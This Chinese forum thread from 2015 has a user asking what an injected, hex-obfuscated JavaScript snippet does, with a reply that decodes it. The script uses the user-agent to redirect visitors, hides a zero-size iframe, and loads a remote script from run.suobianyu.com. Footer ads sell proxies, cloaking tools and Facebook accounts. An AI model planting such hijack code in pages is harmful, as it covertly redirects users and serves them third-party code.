电脑又被种马了，大家看看这个代码几个意思？

herrzy · 发表于 2015-9-5 19:50:48

<SCRIPT LANGUAGE="JavaScript">
var tourl = "http://www.benbenq.com/article/592258.html";
eval('\x76\x61\x72\x20\x75\x61\x20\x3d\x20\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x75\x73\x65\x72\x41\x67\x65\x6e\x74\x2e\x74\x6f\x4c\x6f\x77\x65\x72\x43\x61\x73\x65\x28\x29\x2c\x0a\x62\x72\x6f\x77\x73\x65\x72\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x76\x65\x72\x3a\x20\x28\x75\x61\x2e\x6d\x61\x74\x63\x68\x28\x2f\x28\x3f\x3a\x72\x76\x7c\x6d\x65\x7c\x72\x61\x7c\x69\x65\x29\x5b\x5c\x2f\x3a\x20\x5d\x28\x5b\x5c\x64\x2e\x5d\x2b\x29\x2f\x29\x20\x7c\x7c\x20\x5b\x30\x2c\x20\x22\x30\x22\x5d\x29\x5b\x31\x5d\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6f\x70\x65\x72\x61\x3a\x20\x2f\x6f\x70\x65\x72\x61\x2f\x2e\x74\x65\x73\x74\x28\x75\x61\x29\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x78\x74\x68\x6f\x6e\x20\x3a\x20\x2f\x6d\x61\x78\x74\x68\x6f\x6e\x2f\x2e\x74\x65\x73\x74\x28\x75\x61\x29\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74\x68\x65\x77\x6f\x72\x6c\x64\x3a\x20\x2f\x74\x68\x65\x77\x6f\x72\x6c\x64\x2f\x2e\x74\x65\x73\x74\x28\x75\x61\x29\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x71\x71\x3a\x20\x2f\x71\x71\x62\x72\x6f\x77\x73\x65\x72\x2f\x2e\x74\x65\x73\x74\x28\x75\x61\x29\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x67\x6f\x75\x3a\x20\x2f\x73\x65\x20\x2f\x2e\x74\x65\x73\x74\x28\x75\x61\x29\x2c\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6c\x69\x65\x62\x61\x6f\x3a\x20\x2f\x6c\x69\x65\x62\x61\x6f\x2f\x2e\x74\x65\x73\x74\x28\x75\x61\x29\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x66\x69\x72\x65\x66\x6f\x78\x3a\x20\x2f\x6d\x6f\x7a\x69\x6c\x6c\x61\x2f\x2e\x74\x65\x73\x74\x28\x75\x61\x29\x20\x26\x26\x20\x21\x2f\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x7c\x77\x65\x62\x6b\x69\x74\x29\x2f\x2e\x74\x65\x73\x74\x28\x75\x61\x29\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x72\x6f\x6d\x65\x3a\x20\x2f\x63\x68\x72\x6f\x6d\x65\x7c\x63\x72\x69\x6f\x73\x2f\x2e\x74\x65\x73\x74\x28\x75\x61\x29\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x61\x66\x61\x72\x69\x3a\x20\x2f\x77\x65\x62\x6b\x69\x74\x2f\x2e\x74\x65\x73\x74\x28\x75\x61\x29\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x75\x63\x3a\x20\x2f\x75\x63\x62\x72\x6f\x77\x73\x65\x72\x2f\x2e\x74\x65\x73\x74\x28\x75\x61\x29\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x65\x3a\x20\x2f\x6d\x73\x69\x65\x2f\x2e\x74\x65\x73\x74\x28\x75\x61\x29\x20\x26\x26\x20\x21\x2f\x6f\x70\x65\x72\x61\x2f\x2e\x74\x65\x73\x74\x28\x75\x61\x29\x0a\x7d\x3b\x0a\x76\x61\x72\x20\x76\x65\x72\x20\x3d\x20\x20\x62\x72\x6f\x77\x73\x65\x72\x2e\x76\x65\x72\x3b\x0a\x69\x66\x28\x62\x72\x6f\x77\x73\x65\x72\x2e\x66\x69\x72\x65\x66\x6f\x78\x20\x7c\x7c\x20\x2f\x41\x6e\x64\x72\x6f\x69\x64\x7c\x57\x69\x6e\x64\x6f\x77\x73\x20\x50\x68\x6f\x6e\x65\x7c\x77\x65\x62\x4f\x53\x7c\x69\x50\x68\x6f\x6e\x65\x7c\x69\x50\x6f\x64\x7c\x42\x6c\x61\x63\x6b\x42\x65\x72\x72\x79\x2f\x69\x2e\x74\x65\x73\x74\x28\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x75\x73\x65\x72\x41\x67\x65\x6e\x74\x29\x29\x7b\x0a\x20\x20\x20\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x6d\x65\x74\x61\x20\x68\x74\x74\x70\x2d\x65\x71\x75\x69\x76\x3d\x52\x65\x66\x72\x65\x73\x68\x20\x63\x6f\x6e\x74\x65\x6e\x74\x3d\x5c\x22\x30\x3b\x75\x72\x6c\x3d\x22\x2b\x74\x6f\x75\x72\x6c\x2b\x22\x5c\x22\x3e\x22\x29\x3b\x0a\x7d\x65\x6c\x73\x65\x20\x7b\x0a\x20\x20\x20\x20\x20\x77\x69\x6e\x64\x6f\x77\x2e\x73\x63\x3d\x22\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x22\x2b\x74\x6f\x75\x72\x6c\x2b\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e\x22\x3b\x0a\x20\x20\x20\x20\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x5c\x22\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3a\x70\x61\x72\x65\x6e\x74\x2e\x73\x63\x5c\x22\x20\x77\x69\x64\x74\x68\x3d\x30\x20\x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e\x22\x29\x3b\x0a\x7d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x27\x68\x74\x74\x70\x3a\x2f\x2f\x72\x75\x6e\x2e\x73\x75\x6f\x62\x69\x61\x6e\x79\x75\x2e\x63\x6f\x6d\x2f\x61\x2e\x6a\x73\x27\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x22\x29\x3b');
</SCRIPT>

seanhere · 发表于 2015-9-5 20:41:18

本帖最后由 seanhere 于 2015-9-5 20:45 编辑

var ua = navigator.userAgent.toLowerCase(),. p! W) a% ]* U" H7 @0 `7 }
browser = {
. J' X5 U7 ~( F2 \, Z
ver: (ua.match(/(?:rv|me|ra|ie)[\/: ]([\d.]+)/) || [0, "0"])[1],$ Q' o) o, P2 {' e
opera: /opera/.test(ua),
( g. c% m% ^; Y9 _5 g3 p& o
maxthon: /maxthon/.test(ua),1 I) E+ T" O' V( z6 O
theworld: /theworld/.test(ua),
& m1 ?0 S6 M& m' C+ q: M
qq: /qqbrowser/.test(ua),9 P2 H7 @! H* t! E9 W
sogou: /se /.test(ua),
' {1 d$ G9 g! E
liebao: /liebao/.test(ua),
% I$ O: r6 J, B5 J5 L) {! }
firefox: /mozilla/.test(ua) && !/(compatible|webkit)/.test(ua),
. v& }; ^% v9 h' V/ G/ |
chrome: /chrome|crios/.test(ua),
2 U; Q+ a! `4 ?, ]# M, l$ s1 R
safari: /webkit/.test(ua),
, l* `7 |) c' c# U5 e0 V( s
uc: /ucbrowser/.test(ua),3 a( S6 C$ h- R
ie: /msie/.test(ua) && !/opera/.test(ua)/ {6 r; A/ r% M+ u; t# y- Q) b5 h; s
};
5 b& p0 d2 J& p" P0 J
var ver = browser.ver;
5 t" T6 t# M! _5 t( n
if (browser.firefox || /Android|Windows Phone|webOS|iPhone|iPod|BlackBerry/i.test(navigator.userAgent)) {% t2 f! o" r$ E$ \/ }
document.write("<meta http-equiv=Refresh content="0;url=" + tourl + "">");
x1 S4 {- h3 x% x: u+ Y( E
} else {9 u; U' E0 r) @ n/ A& Q1 a
window.sc = "<iframe src=" + tourl + "></iframe>";
9 [; Y* x2 v# G8 r8 B
document.write("<iframe src="javascript:parent.sc" width=0 height=0></iframe>");3 Y+ m; E6 r; H1 \+ U- [+ ] }
}
) z) [( \, V: H5 ^& c7 S l
document.write("<script src='http://run.suobianyu.com/a.js'><\/script>");

复制代码

好像是根据用户浏览器的User-agent信息来决定如何跳转。

herrzy · 发表于 2015-9-5 21:16:45

seanhere 发表于 2015-9-5 20:41
: Q, A/ I. }' x/ @) ~( B( U好像是根据用户浏览器的User-agent信息来决定如何跳转。

那就好，我看我3389被开了，扫描下有病毒。是不是还有木马没扫除来呢？3389明明是关了的啊

a.lucksky · 发表于 2015-9-5 22:48:36

这个是最简单的浏览器劫持
重新安装一个浏览器即可

河小马 · 发表于 2015-9-8 08:39:42

太狠了。。

左眼跳 · 发表于 2015-9-11 11:55:57

windows 就是容易蛋疼

		自动登录	找回密码
密码			立即注册

谷歌+Bing+TT+MSN官方代理	⚡️按条S5代理⚡️静态⚡️独享⚡️5G	⚡️最干净<Wifi住宅+5G移动>IP代理	泰国仓储，本土仓发货2-3元/单
指纹浏览器，就用AdsPower	谷歌/FB/Bing/Yahoo代理商开户	7200W全球动态不重复住宅IP代理	出售Facebook,友缘号,FB广告号,ins
FB/TT/KW 加白开户	ADPLEXITY + ADVERTCN	比Adplexity还好用的Spy工具	广
告	开	户	FB/Google/TK
海外多媒体	极速	下户	BINOM TRACKER 60% OFF!
MediaGo+Taboola+Ob开户	百度国际MediaGo⚡️让产品狂奔全球	百度国际，高点击转化，快速放量	百度国际MediaGo，独家原生流量
虚拟信用卡+独立站收款	行业首创新型指纹Cloak, 谷歌奇效!	Kookeey⚡️100%独享⚡️原生住宅IP	⚡IPFoxy住宅代理全场88折⚡
全球虚拟卡, 支持U充值	免账户投放 FB 广告（送项目）	2024做什么 - Media buy 项目库	免费黑五教程（持续更新、欢迎交流）
Facebook 批量上广告	Bridgeway - 联盟营销网络	IPCola 全新住宅代理 ⚡️ 免费试用	各种主页、账单户、BM户（优势）
⚡️个人户，bm户不限额，账单户	Adsterra 的CPA/CPM/CPC 网站流量	在线注册美国/英国/香港等海外公司	EU KETO/CBD - Jumbleberry
FB二三解1元/个	9Proxy ⚡️ $0.04/IP, 无限带宽	cloak斗篷/ss/nutra/cpa/Dating	E.PN 虚拟卡
Asocks代理服务器$3/GB	高薪诚求实力FB投手（独立站）	《全新虚拟卡+全球收付款》	广告位出租
全球低价纯净住宅/移动IP-免费试用	广告代投, 东南亚物流, 虚拟信用卡	VMLogin指纹浏览器+多账号防关联

[吐槽] 电脑又被种马了，大家看看这个代码几个意思？

本帖子中包含更多资源

相关帖子

点评

社区QQ达人